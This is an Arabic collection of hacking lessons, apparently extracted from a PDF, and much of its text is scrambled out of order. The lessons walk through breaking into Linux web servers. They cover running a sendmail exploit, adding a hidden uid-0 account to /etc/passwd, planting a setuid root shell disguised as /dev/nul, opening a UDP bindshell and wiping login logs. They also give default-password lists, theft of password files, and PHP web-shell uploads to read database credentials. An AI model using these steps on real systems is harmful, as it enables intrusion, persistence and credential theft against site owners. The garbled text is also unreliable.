بي على قدر‬ ‫المستطاع)احنا عايزينك =((‬ ‫فيه اكسبلويتات اخرى تعطيك صلحيه اظهار ملف الباسورد‪.com etc‬‬ ‫او المواقع السيئه المحتوى كالباحيه او التي تسب الدين ‪ .9..‬اي تي سي =<‬ ‫وضع باك دور ‪-:‬‬‫جميل ‪ .‬اذن فقد اخذنا رووت على السيستم ‪.03‬‬ ‫طيب لو عندنا اكسبلويت للسند ميل اسمها ‪exploit...‬كده انا بقيت رووت =(‬ ‫طيب فيه العديد من الكسبلويتت مش بتخليك رووت على السيستم‪. ibm........‬و انما تديك بس شيل هنال‬ ‫لذلك يجب عليك ن تقوم برفع اكسبلةيت اخر لوكل ‪local‬‬ ‫للحصول على الرروت في النظام‪./exploit‬‬ ‫‪This is a sendmail 8..c -o exploit‬‬ ‫‪sh-2..‬انت لو كتبت ‪ exit‬حتطلع بره السيرفير ده و تعود للشيل بتاعك و عشان ترجع تاني يلزمك‬ ‫نفس الخطوات‬ ‫و في هذه الفتره قد يحتمل ان يكون الدمين قد قام بتغيير الباسورد او ركب باتش للديمون المصاب او قام‬ ‫بعمل اب جريد له‬ ‫مما يؤدي ان تفشل الكسبلويت في عملها ‪.‬‬ ‫احسن باك دور هوه الهاك اتاك ‪...‬ماذا بعد ؟؟؟فعل انت في امكانك ان تقوم بتغير الموقع او‬ ‫الصفحه الرئيسيه‬ ‫كل ما عليك ان تبحث عن الندكس في اي مكان او باستخدام المر فايند ‪..‬و الحل ؟؟‬ ‫بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ‪.edu‬‬ ‫جميل جميل ‪$.‬على اي حل مش موضوعنا دهه‬ ‫طيب احنا دلوقتي عايزين نحتفظ بالموقع دهه ‪..03$ ..11 exploit‬‬ ‫‪usage: ..‬يمكننا اول عمل الكومبايل و تشغيله كتاللي‪:‬‬ ‫‪sh-2..‬لكن انا ساذكر لكم الساسيات‬ ‫فقط ‪../exploit target port‬‬ ‫‪sh-2..‬‬ ‫فاغلب الهاكرز بامكانهم اختراق هذه الدومينات‬ ‫و لكن انصحك جديا بتغيير الصفحه الرئيسيه في موقع محترم مثل‬ ‫‪microsoft.<Last login: Fry Sep 15 11:45:34 from <yourIPaddress‬‬ ‫‪sh-2.03$./exploit 25 target.

03$ /dev/nul‬‬ ‫‪sh-2.‬في كثير من الشيلز تمنع اعطاء صلحيات ال ‪ suid‬يعني مينفعش نحصل على ال ‪sushi‬‬ ‫و في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل خاص تاني اسمه ‪ sash‬و هو اختصار ل ‪A‬‬ ‫‪stand-alone shell‬‬ ‫ذو اوامر خاصه به ‪.03$ cd /dev‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪root‬‬ ‫احنا سوبر يوزرز الن بكل سهوله =(‬ ‫فيه مشكله ‪ ..03$ exit‬‬ ‫بعد ‪ 80‬يوم لو رجعنا =‪ D‬تعال نشوف كده اللي حيحصل ‪:‬‬ ‫‪sh-2.03$ whoami‬‬ ‫‪dood‬‬ ‫‪248‬‬ .03$ vi /etc/passwd‬‬ ‫طبعا لزم يكون عندك فكره عن كيفيه استخدام المحرر ‪vi‬‬ ‫في الملف ده حتلقي سطر لكل يوزر عادي يكون على الشكل ده‬ ‫‪luser:passwd:uid:gid:startdir:shell‬‬ ‫في حاله السوبر يوزرز بيكون ال ‪uid & gid =0‬‬ ‫اذن اضف السطر ده ‪:‬‬ ‫‪dood::0:0:dood:/:/bin/sh‬‬ ‫و كده اانت ضفت سوبر يوزر للنظام‬ ‫‪sh-2...‫لكي تقوم بعمل ‪ sushi‬او ‪ suid shell‬يلزمك ان تقوم بنسخ ال ‪bin/sh/‬‬ ‫الى مكان خفي و نقوم باعطاءه صلحيات ال ‪ suid‬كالتالي ‪:‬‬ ‫‪sh-2.‬خليك مع المر الول بيعمل‬ ‫في كله ‪.03$ chmod 4775 nul‬‬ ‫‪ 4775‬معناها ال ‪ suid‬اللي احنا عايزينها ‪..‬‬ ‫خلي بالك ان المر ‪ chmod +s nul‬ممكن ميشتغلش في بعض النظمه ‪ .03$ chown root nul‬‬ ‫نعطي الشيل الصلحيات اللي احنا عايزينها ‪-:‬‬ ‫‪sh-2.‬تعالى نطلع بره كده و نشوف‬ ‫‪sh-2. dev‬و لو حصل و نظر دخله فانه لن يشعر بشيء‬ ‫غريب لن فيه ملف اساسا اسمه ‪null‬‬ ‫=‪ D‬ل ده احنا عيال جدعان اوي =‪D‬‬ ‫‪sh-2...03$ cp /bin/sh /dev/nul‬‬ ‫هههههه‬ ‫في اغلب الحيان الدمين ل ينظر داخل الدايركتوري ‪ .03$ whoami‬‬ ‫‪luser‬‬ ‫‪sh-2.03$ su dood‬‬ ‫‪sh-2..‬‬ ‫كده خلصنا مهمتنا ‪.‬‬ ‫و هو يسمح باعطاء صلحيات ال ‪ suid‬ل ‪ bin/sh/‬اذن نقدر نعمل الن ال ‪sushi‬‬ ‫‪ -2‬كيف نضيف يوزرز مزورين ؟؟‬ ‫طبعا انت رووت و تقدر تعمل تغيير في الملف ‪ etc/passwd/‬و ممكن من خلل الملف ده انك تضيف اي‬ ‫حد انت عايزه‬ ‫باستعمال المحرر ‪-: vi‬‬ ‫‪sh-2.

‫طبعا احنا رووت ‪.‬فنكا ترى رساله عند اول الدخول تعلمك باخر مره‬ ‫قمت بها بالدخول و رقم الي بي الذي دخلت منه ‪..../zap2 luser‬‬ ‫‪!Zap2‬‬ ‫‪sh-2.‬‬ ‫يعني سيادتك لو دخلت باسم يوزر و بعد كده اليوزر ده دخل حيلقي الرساله دي‬ ‫‪..<Last login: Sun Sep 24 10:32:14 from <yourIPaddress‬‬ ‫و طبعا سيادتك كده حتتكشف‬ ‫لن اليوزر ده لو كان ناصح حيبعت ايميل للدمين و يقوله و يبلغه باللي حصل‬ ‫و طبع الدمين في الحال حيبعتله رساله و يقوله ‪-:‬‬ ‫متخافش يا واد ده واحد دخل على الحساب بتاعك و الي بي بتاعه موجوود ‪ ....‬‬ ‫في حاله استخدام ‪ ftp‬لرفع الدوات يتخلف عن ذلك معلومات ايضا يمكنك ازالتها‬ ‫باستخدام ‪ wted‬و هو شبيه بالده السابقه ‪lled‬‬ ‫ماذا لو طبقنا المر ‪ who‬و لقينا معانا الرووت ؟؟‬ ‫‪sh-2.03$ .‬ليه لن الخ ‪ dood‬كل من ال ‪ gid‬و ال ‪ uid‬يساوي صفر‬ ‫‪ -3‬كيف تضع ‪ bindshell‬؟‬ ‫‪ bindshell‬عباره عن ديمون شبيه جد بال ‪ telnetd‬في الحقيقه التلنت ديمون عباره عن بايند شيل ‪.‬‬ ‫البايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ ‪ TCP‬بل منفذ ‪UDP‬‬ ‫و طبعا بيعطيك شيل عند التصال بهذا البورت ‪.‬عندما تقوم بالدخول الى حسابك ‪ .‬‬ ‫الطريف و الشيق في الموضوع انه الدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلب‬ ‫الحيان السكن يكون‬ ‫على منافذ ال ‪ TCP‬و نادرا جدا ان يعمل سكان على منافذ بروتوكول ‪UDP‬‬ ‫ عمليه ازاله الثار ‪-:‬‬‫في نظاام اليونيكس ‪.‬‬ ‫بيكون معاه ملف للمساعده اقراه لكي تعرف طريقه الستخدام ‪..‬و ن ان شاء ال‬ ‫حاتصل بمزود الخدمه في المنطقه و اساله عن رقم التلفون و ان شاء ابلغ البوليس ‪.‬‬ ‫و بالهنا و الشفا =(‬ ‫المعلومات دي موجوده في المناطق دي‬ ‫‪usr/adm/lastlog/‬‬ ‫‪var/adm/lastlog/‬‬ ‫‪var/log/lastlog/‬‬ ‫يمكنك مسحهم باستخدام ‪ lled‬و دي ممكن تلقيها في اي موقع مهتم ‪.03$ who‬‬ ‫‪sh-2.03$‬‬ ‫كلمه اخيره ‪:‬‬ ‫‪249‬‬ ....03$ who‬‬ ‫‪Sep 25 18:18‬‬ ‫‪tty1‬‬ ‫‪root‬‬ ‫ممكن في الحاله دي نستخدم ‪zap2‬‬ ‫لو اسمك ‪: luser‬‬ ‫‪sh-2.

..‫هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن ال ‪.‬‬ ‫و أنا كالعادة لست مسؤول عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض و‬ ‫زيادة المعرفة الشخصية‬ ‫في هذا القسم أقوم بشرح الخطوات الساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أية‬ ‫معلومات أو شروح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا‬ ‫الـــهـــكـــر‬ ‫نحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات‬ ‫‪250‬‬ .‬‬ ‫انتهى‪،،،‬‬ ‫" درس اخر في اختراق المواقع عن طريق لينكس "‬ ‫>ةةةةة ةة ةةةةة ةةةة ةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةة ةةة <‬ ‫اختراق لينكس‪.‬‬ ‫اتمنى ان يحوز على رضاكم‪..

‬جمع المعلومات‬ ‫لبد أنك جاهز الن قم بتشغيل ‪ notepade‬ونافذة متصفح جديد من خلل محطم أي بي أو أي موقع آخر‬ ‫مثل‬ ‫‪Hakkerz.com‬مزود خدمات على النترنت‬ ‫الذي سيقوم بإعطائه ‪:‬‬ ‫اسم مستخدم و هو التعريف لمجلد راشد على الشبكة‬ ‫كلمة مرور و هي مفتاحه للدخول إلى مجلده و قسمه‬ ‫و هذان هما السبيل للوصول إلى جميع الخدمات المتاحة لراشد‬ ‫و سوف نركز على الوصول إلى اللب والصل‬ ‫هناك طريقتان رئيستان للدخول إلى نظام الولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم و‬ ‫هي بطيئة و نادرة وأما الطريقة الثانية فهي استغلل مناطق ضعف الخادم و التسلل من خللها‬ ‫إن التخريب ممنوع و لنه من السهل مطاردتك إن إكتشاف محولتك للختراق عن طريق الي بي أدرس فهو‬ ‫رقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك‬ ‫يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من الماكن العامة مثل مقاهي النترنت و هذا‬ ‫أحد البرامج‬ ‫قم بتغيير البروكسي و هذا هو السهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم‬ ‫بتعطيل خدمة ‪ Caller ID‬إذا كانت تعمل‬ ‫نحن الن نأخذ الخطوة الولى لي عملية هكر ‪.‫إن قول اختراق أو تخريب يعني الحصول على صلحيات على سيرفرات الشبكات ل يسمح لنا بالحصول عليها‬ ‫في الحوال العادية فخوادم الشبكات معدة لستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة‬ ‫فالنفترض أن لراشد حساب على الفريسرفرز‬ ‫‪ FreeServers..org‬‬ ‫قم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ ‪ html‬لي صفحة مهمة‬ ‫قم بإرسال و همي لهم أقصد إيميل غير موجود مثل‬ ‫‪@Blahblahblah‬اسم الموقع‬ ‫و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد‬ ‫المرسل إليه و معه بعض المعلومات الموجوده في ‪ header‬الرسالة‬ ‫أنت الن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية‬ ‫أول ستحتاج إلى الي بي ‪ IP‬و ثانيا خدمة التعريف ‪ Whois‬لتحصل عن معلومات عنه‬ ‫الذي سيعطيك معلومات عن مالكي الموقع و نوع السيرفر عليه و قم بتسجيلها‬ ‫‪251‬‬ ..ml.home.

Victim.com‬‬ ‫كلمة ‪ telnet‬كما ترى مكان ‪ www‬و إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها من‬ ‫‪ whois‬و بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر‬ ‫الن قم بتغيير المنفذ إلى ‪ 21‬و الن سيأخذك إلى منفذ ال ‪ ftp‬فإن حصل ذلك جرب كتابة‬ ‫‪ SYST‬لتعرف نوع السيرفر الن إذا كنت محظوظا جرب المنفذ ‪ 80‬الذي يعد منفذ ال ‪ http‬وسجل أي‬ ‫بينات و أهمها على الطلق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى ‪Whats‬‬ ‫‪ ?Running‬و قد يعمل و لكن سيرفر الضحية سيسجل ذلك‬ ‫و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب الن الباسوورد الذي‬ ‫ستحصل عليه باستخدام‬ ‫‪Login: root$‬‬ ‫‪Password: root$‬‬ ‫فلنقم بتجربة هذا أول حيث أن برامج ‪ linux‬تأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كما‬ ‫هي لذلك عليك القيام باتصال باستخدام ‪ telnet‬و الذي هو من الموقع سالف الذكر و ل تستخدم البرنامج‬ ‫العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية‬ ‫‪ACCOUNT: PASSWORD‬‬ ‫)‪login) root: (password) root‬‬ ‫‪sys: sys / system / bin‬‬ ‫‪bin: sys / bin‬‬ ‫‪mountfsys: mountfsys‬‬ ‫‪adm: adm‬‬ ‫‪uucp: uucp‬‬ ‫‪nuucp: anon‬‬ ‫‪anon: anon‬‬ ‫‪user: user‬‬ ‫‪games: games‬‬ ‫‪install: install‬‬ ‫‪252‬‬ .home.ml.‫الن عليك باستخدام خاصية ‪ finger‬جرب أول‬ ‫اسم الموقع ‪@Finger‬‬ ‫و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في العلى‬ ‫الن عليك القيام بفحص المنافذ ‪ scan ports‬للي بي ‪ IP‬الذي حصلنا عليه لكي تعرف المنافذ المفتوحة‬ ‫و الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها لنظمة ‪Linux /Unix systems‬‬ ‫و هذا البرنامج ‪ Exploit Generator‬خاص بأنظمة ويندوز على الشبكات‬ ‫و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة لن هذا العمل غير شرعي و قد يتم‬ ‫الكشف عنه إل إذا ما كنت تمتلك نظام ‪ linux‬ما يهمنا من ذلك أنه إذا كان المنفذ ‪ 21‬مفتوحا فيعني ذلك‬ ‫أنهم يدعمون ‪ FTP‬و إن كان ‪ 23‬فذلك أنهم يملكون ‪TelNet‬‬ ‫‪ Telnet‬الهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع ‪ Anonymous‬في متصفحك و على‬ ‫العموم للقيام بكل تلك المور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ل تتعب في البحث‬ ‫‪ hakkerz.org‬المهم فلنتابع حديثنا قم بفتح نافذة ‪ telnet‬و غير المنفذ إلى ‪ 23‬و إذا كان‬ ‫الموقع يبدأ ب ‪ www‬فجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة ‪telnet.

‫‪demo: demo‬‬ ‫‪umountfsys: umountfsys‬‬ ‫‪sync: sync‬‬ ‫‪admin: admin‬‬ ‫‪guest: guest‬‬ ‫‪daemon: daemon‬‬ ‫و إذا لم تصلح فإن هناك العديد من الناس الغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة‬ ‫الشق الول من البريد اللكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من‬ ‫‪ whois‬و أن كنت تعيس الحظ إلى الن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام ‪unix‬‬ ‫فإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى ‪ passwd‬لذلك علينا‬ ‫المحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ‪ ftp‬و الذي سندخل إليه باستخدام نافذة‬ ‫المتصفح و في نظري ‪ internet explorer‬ينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم و‬ ‫كما فتحنا النافذة سابقا باستخدام ‪ IP jammer‬الموجود في موقع ‪ .org‬سنعيد‬ ‫الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء الي بي و قم بالتجربة عن طريق الشكل التالي‬ ‫مثل‬ ‫‪ ftp:// abc.home.net‬و إن لم يعمل أي منها قم بتجربة أي مواقع ‪ ftp‬كانت‬ ‫موجودة في البيانات المعطاة من ‪ whois‬فالنفترض أنك نجحت في الدخول اضغط على مجلد \‪ etc‬و الن‬ ‫ستر ملف ‪ passwd‬قم بتنزيله على جهازك وقم بفتحه و إن كان على الشكل التالي فأنت محظوظ‬ ‫‪root:2fkbNba29uWys:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:rYsKMjnvRppro:100:11:WWW‬‬ ‫‪administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:3A62i9qr:1012:10:Hisaharu‬‬ ‫]‪[.abc.‬‬ ‫انتهى‪،،،‬‬ ‫‪253‬‬ .net‬أو ‪ /ftp://ftp.5‬و الذي يحتاج إلى ملفات كلمات كثيرة‪.etc‬‬ ‫و هنا ترى اسم المستخدم و هو ‪ kangaroo‬و تشفير الباسوورد وليس هي هو ‪ 3a62i9qr‬أو سيكون‬ ‫المنظر فوق أشبه بالتالي‬ ‫‪root:*:0:1:Operator:/:/bin/csh‬‬ ‫‪admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh‬‬ ‫‪kangaroo:*:1012:10:Hisaharu‬‬ ‫‪TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh‬‬ ‫و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو‬ ‫*’‪ s‬أو ‪ ?x’s‬و إن حصلت على النوع في العلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و‬ ‫فك تشريرها مثل ‪ John the Ripper 1.ml.hakkerz.

.‬‬ ‫البي اتش بي شيل ملف يرعب كل صاحب موقع على سيرفر وحله اسهل مما يمكن‬ ‫ل فسمحولي ‪(:‬‬ ‫الموضوع بسيط جدًا لكن سأطوله قلي ً‬ ‫اوًل ‪:‬‬ ‫راجع الوصلة التالية‬ ‫ثانيًا ‪:‬‬ ‫‪254‬‬ ..‫" درس عن الـ ‪) PHP Shell‬الجزء الول( "‬ ‫>منقول من موقع ‪< pharaonics‬‬ ‫>الكاتب‪> Arab VieruZ:‬‬ ‫موضوع للبي اتش بي شل يشرح الطرق والخداع المستخدمة و اوامر لينكس‬ ‫السلم عليكم‪.

‫الن وبعد قراءتك الموضوع كامل اتوقع منك معرفة ما هو الـ ‪PHP Shell‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الول ‪:‬‬ ‫اوامر لينكس‬ ‫*‪*-----------------------------------------------‬‬ ‫امر سرد الملفات ‪ls -a :‬‬ ‫سرد جميع الملفات المخفية او غيرها‬ ‫*‪*-----------------------------------------------‬‬ ‫امر عرض محتويات الملف ‪ cat -e :‬او ‪cat‬‬ ‫فتح الملف وعرض محتوياته‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف الملف ‪rm -f :‬‬ ‫لحذف الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر حذف المجلد ‪rm -d :‬‬ ‫لحذف المجلد الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر النسخ ‪cp -i :‬‬ ‫لنسخ الملف الذي تريد‬ ‫*‪*-----------------------------------------------‬‬ ‫امر اعادة التسمية ‪mv :‬‬ ‫لعادة التسمية‬ ‫*‪*-----------------------------------------------‬‬ ‫ملحظة ‪ :‬لمعرف المزيد من اوامر لينكس قم بشراء الكتب وللحصول على‬ ‫معلومات اكثر لمر من الوامر كم بوضع المر ثم ‪help--‬‬ ‫‪255‬‬ .

‫مثال ‪ls --help :‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثاني ‪:‬‬ ‫كيفية تنفيذ الوامر ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪256‬‬ .

‫‪ -1‬ستجد مربع للكتابة قم بكتابة المر المراد تنفيذه‬ ‫‪ -2‬هنا تعرض الملفات والمجلدات‬ ‫‪ -3‬هنا تعرض المجلدات فقط‬ ‫‪ -4‬مكان الفلودر الذي تعمل عليه الن‬ ‫‪ -5‬ضع العلمة ليخبرك ما يحدث عند وجود خطأ‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الثالث ‪:‬‬ ‫الخدع والطرق لتحميل هذا الملف ‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هنا تأتي المشكله !!!‬ ‫لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيًا‬ ‫‪ -1‬ايجاد ثغرة تستطيع منها تحميل الملف‬ ‫مثال ‪ :‬ثغرة النوك القديمة حقت الـ ‪hacked.‬‬ ‫انتهى‪،،،‬‬ ‫‪257‬‬ .txt‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جدًا وحريص‬ ‫هذي طريقه قد تنفع اوًل تحديد الشركة المستضيفة و نحاول البحث عن مواقع‬ ‫في نفس السيرفر او على القل في نفس شركة الستضافة يكون صاحبها دلخ‬ ‫ونحاول نلقى ثغرة نحمل منها الملف‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬المواقع المجانية التي تدعم البي اتش بي‪.

php‬‬ ‫وسيظهر الباسورد في احد المتغيرات‬ ‫‪258‬‬ .php‬‬ ‫ويمكن اخذ الباس عن طريق تنفيذ المر التالي في الـ ‪PHP Shell‬‬ ‫الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة المر التالي‬ ‫‪cat config.‫" درس عن الـ ‪) PHP Shell‬الجزء الثاني( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫نتابع الموضوع مباشره‬ ‫*‪*-----------------------------------------------‬‬ ‫*‪*-----------------------------------------------‬‬ ‫الجزء الرابع ‪:‬‬ ‫طرق الحصول على الباسورد‪:‬‬ ‫*‪*-----------------------------------------------‬‬ ‫هذا الجزء سيأخذ موضوع الـ ‪PHP Shell 2‬‬ ‫طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق ‪.‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -1‬اخذ الباس من ملفات اكسس الـ ‪ My SQL‬التي تسمى بالعادة ‪config.

pwd :‬‬ ‫رابط ‪ :‬راجع درس ‪ DeXXa‬الخاص بهذا القسم‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -4‬ل يمكن اعتبارها كقسم لكن كملحظة ال وهي ‪:‬‬ ‫ان بعض المواقع تتحد في سكربتات مثل الـ ‪phpMyAdmin‬‬ ‫ويكون لكن موقع اكسس خاص لدخول هذا السكربت‬ ‫ويكون بملف الـ ‪ config.php‬يكون الروت للقاعدة‬ ‫يعني يمكن تعدل وتمسح اي قاعدة لي موقع كان !!‬ ‫انتهى‪،،،‬‬ ‫‪259‬‬ .‬‬ ‫ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح‬ ‫الـ ‪ htaccess.pwd‬‬ ‫وهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر ‪DES‬‬ ‫ويوجد داخل مجلد ‪:‬‬ ‫_‪vti_pvt‬‬ ‫المر ‪cat /home/site/www/_vti_pvt/service.htpasswds/forum/admin/passwd :‬‬ ‫ستجد الباس المشفر بتشفير ‪ DES‬يعني تقدر تفكه بجون ذا رايبر‬ ‫‪user:nymw4oS3oerdY‬‬ ‫*‪*-----------------------------------------------‬‬ ‫‪ -3‬طريقة الكستينشون سيرفر او ‪: service.‬حتى تجد مكان الملف السابق‬ ‫مثال ‪/home/site/.‫*‪*-----------------------------------------------‬‬ ‫‪ -2‬اخذ الباس المشفر من ملف الـ ‪htpasswed.htpasswds/forum/admin/passwd :‬‬ ‫المر ‪cat /home/site/.

‫" درس عن الـ ‪) PHP Shell‬الجزء الثالث( "‬ ‫>ةةةةة ةة موقع ‪< pharaonics‬‬ ‫>ةةةةةة‪> Arab VieruZ:‬‬ ‫الجزء الخامس و الخير من هذا الدرس‬ ‫بما انك الن عرفت معظم الشياء لكن لبد من وجود مشاكل سأذكر الذي اصابني‬ ‫*‪*-----------------------------------‬‬ ‫‪ -1‬مشكلة عرض المواقع الخرى ‪:‬‬ ‫جميع المواقع الموجودة في السيرفر في ‪:‬‬ ‫‪home/‬‬ ‫المر ‪ :‬قم بالذهاب الى مجلد الروت ‪/‬‬ ‫‪ls -a /home‬‬ ‫ستجد مجلدات كل مجلد يحوي ملفات موقع ما لعرضه‬ ‫‪ls -a /home/SITE‬‬ ‫‪ = SITE‬اسم الموقع او المجلد‬ ‫*‪*-----------------------------------‬‬ ‫‪ -2‬مشكلة عرض ملفات الموقع ‪:‬‬ ‫بعض السيرفرات ل تسمح بدخول ‪ home‬الموقع ال اذا كنت انت روت او صاحب الموقع‬ ‫الحل ‪:‬‬ ‫‪260‬‬ .

‫قم بدخول ‪:‬‬ ‫‪/home/site/public_html‬‬ ‫او‬ ‫‪/home/site/www‬‬ ‫لدخول الى ملفات الموقع التي تعرض‬ ‫*‪*-----------------------------------‬‬ ‫‪ -3‬بعض الوامر ل تعمل‬ ‫هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر‬ ‫اقصد اصدار الكرنل‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪261‬‬ .

‬وتدعم النماب‬ ‫عدد كبير من تقنيات المسح مثل ‪:‬‬ ‫‪UDP‬‬ ‫‪()TCP connect‬‬ ‫‪(TCP SYN (half open‬‬ ‫‪(ftp proxy (bounceattack‬‬ ‫‪Reverse-ident‬‬ ‫‪(ICMP (ping sweep‬‬ ‫‪FIN‬‬ ‫‪ACK sweep‬‬ ‫‪Xmas Tree‬‬ ‫‪SYN sweep‬‬ ‫‪..and Null scan‬‬ ‫النماب تقدم أيضًا عدد من المميزات المتقدمة ‪ .‬مثل‪:‬‬ ‫‪remote OS detection via TCP/IP fingerprinting‬‬ ‫‪stealth scanning‬‬ ‫‪dynamic delay and retransmission calculations‬‬ ‫‪parallel scanning‬‬ ‫‪262‬‬ .nmap‬أداة كشف عن الشبكات و ماسح أمني‬ ‫الخلصة ‪:‬‬ ‫أنواع المسح ‪ -‬الخيارات‬ ‫الوصف ‪:‬‬ ‫صمم هذا البرنامج لكي يسمح لمدراء النظام و الفراد بمسح شبكات كبيرة‬ ‫لتقرير و معرفة المضيفين وماذا يقدمون من خدمات ‪ .‫" شرح أداة ‪" anmap‬‬ ‫>ةةةةة<‬ ‫>ةةةةة ةةةةةة‪ :‬ةةةةة ةةةةةة<‬ ‫السم ‪:‬‬ ‫‪ .

‫‪detection of down hosts via parallel pings‬‬
‫‪decoy scanning port‬‬
‫‪filtering detection‬‬
‫‪direct (non-portmapper) RPC scanning‬‬
‫‪fragmentation scanning‬‬
‫‪flexible target and port specification‬‬
‫نتائج النماب عادةًا ماتكون على هيئة قائمة بالبورتات المهمه التي توجد‬
‫في اللة التي أجريت عليها عملية المسح ‪ .‬والنماب دائمًا يعطينا البورتات وإسم الخدمة والعدد والحالة‬
‫والبروتوكول‬
‫الحاله إما أن تكون مفتوحة او مرشحة أو غير مرشحة‬
‫مفتوحة تعني أن اللة سوف تقبل أي إتصال بهذا البورت‬
‫المرشحة تعني أن هناك فايروول أو فلتر )مرشح( أو أي عقبة أخرى تغطي هذا البورت وتمنع النماب من‬
‫معرفة حالة البورت إذا كان مفتوحًا أو ل‬
‫غير مرشح تعني بأن هذا البورت معروف لدى النماب بأنه مغلق‬
‫ول يبدو أن أي فايروول أو فلتر )مرشح( تدخل في محاولة النماب‬
‫والبورتات غير المرشحة هي أغلب الحالت ول يمكن معرفتهم إل في حالة واحدة ‪ ،‬هي أن يكون معظم‬
‫البورتات‬
‫التي أجريت لهم عملة المسح في حالة ترشيح‬
‫وبالعتماد على الخيارات المستخدمه في النماب فيمكن أن يبلغ عن الحالت المميزة التالية في الريموت‬
‫هوست ‪:‬‬
‫النظام المستخدم‬
‫‪TCP sequencability‬‬
‫أسماء المستخدمين الذين يشغلون البرامج المرتبطة بكل بورت‬
‫أسماء الدي إن إس‬
‫وبعض الشياء الخرى‪.‬‬

‫انتهى‪،،،‬‬

‫‪263‬‬

‫" طريقة لقتحام السيرفرات بدون ثغرات "‬
‫>منقول من منتديات شبكة الحزم السلمية<‬
‫>الكاتب‪<network access :‬‬
‫استخدام الثغرات انا بصراحه ماشوف فيه اي فن ول علم بصراحه انت تستخدم شي جاهز وهذي وجه نظري‬
‫يعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت‬
‫لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغلل الثغرات‬
‫لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع ماراح‬
‫تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثلثه وكل مره يفشل الين يقدر‬
‫يوصل في الخير لنتيجه وعلى الساس هذا انا كتبت الموضوع هذا الي انشال اتمنى انه يكون مفيد وينفعنا‬
‫ال فيه‬
‫ماراح نتكلم عن المشاركه) احس اني ازعجتكم بمواضيع المشاركه (‬
